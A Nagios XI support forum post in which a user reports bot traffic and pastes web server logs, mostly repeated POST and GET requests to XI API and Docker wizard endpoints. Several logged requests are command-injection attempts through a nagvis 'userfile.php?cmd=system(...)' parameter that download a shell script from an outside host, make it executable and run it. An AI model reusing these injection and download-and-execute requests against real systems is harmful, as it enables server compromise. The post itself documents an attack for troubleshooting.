xi being targeted by exploit bots

This support forum board is for support questions relating to Nagios xi, our flagship commercial network monitoring solution.
User avatar
GldRush98
Posts: 256
Joined: Wed May 25, 2011 10:51 am
Location: Springfield, IL

xi being targeted by exploit bots

Post by GldRush98 »

I don't know what they're looking for, but they're sending data to xi-specific URL's.

I found this while tracking down an I/O spike that caused my MariaDB tables to crash several times now. I have discovered that along with each table crash (caused by extremely high I/O I believe), that my system was hammered but a very large number of http calls.

Here is a small sample of the calls that were logged

Code: Select all

45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:05 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:19 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:40 -0600] "GET /nagvis/userfiles/scripts HTTP/1.1" 301 255
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "GET /nagvis/userfiles/scripts/ HTTP/1.1" 403 227
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:42 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:54 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:54 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:51 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:56 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:53 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:53 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:50 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:46 -0600] "-" 408 -
45.138.209.197 - - [12/Jan/2021:22:25:46 -0600] "-" 408 -
45.138.209.197 - - [12/Jan/2021:22:25:47 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22wget%20-q%20https://jquery-dns-07.dns05.com:8080/watch.sh%20-O%20/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:49 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22chmod%20777%20/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:58 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:00 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:01 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 2
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 2
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:14 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:00 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:02 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:01 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:14 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:12 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:08:59 -0600] "GET /nagvis/userfiles/scripts HTTP/1.1" 301 255
45.138.209.197 - - [13/Jan/2021:10:08:59 -0600] "GET /nagvis/userfiles/scripts/ HTTP/1.1" 403 227
45.138.209.197 - - [13/Jan/2021:10:09:00 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:02 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:02 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:27 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:33 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:36 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:36 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:03 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:45 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:45 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:04 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:47 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:47 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:22 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:48 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:05 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:10 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:50 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:50 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:06 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:13 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:18 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:14 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:22 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:15 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:51 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:53 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:19 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:25 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:13 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:01 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522wget%2520-q%2520https://jquery-dns-07.dns05.com:8080/watch.sh%2520-O%2520/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:03 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522chmod%2520777%2520/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:29 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:27 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:34 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:04 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:35 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:53 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:55 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:34 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:55 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:59 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
Some more...

Code: Select all

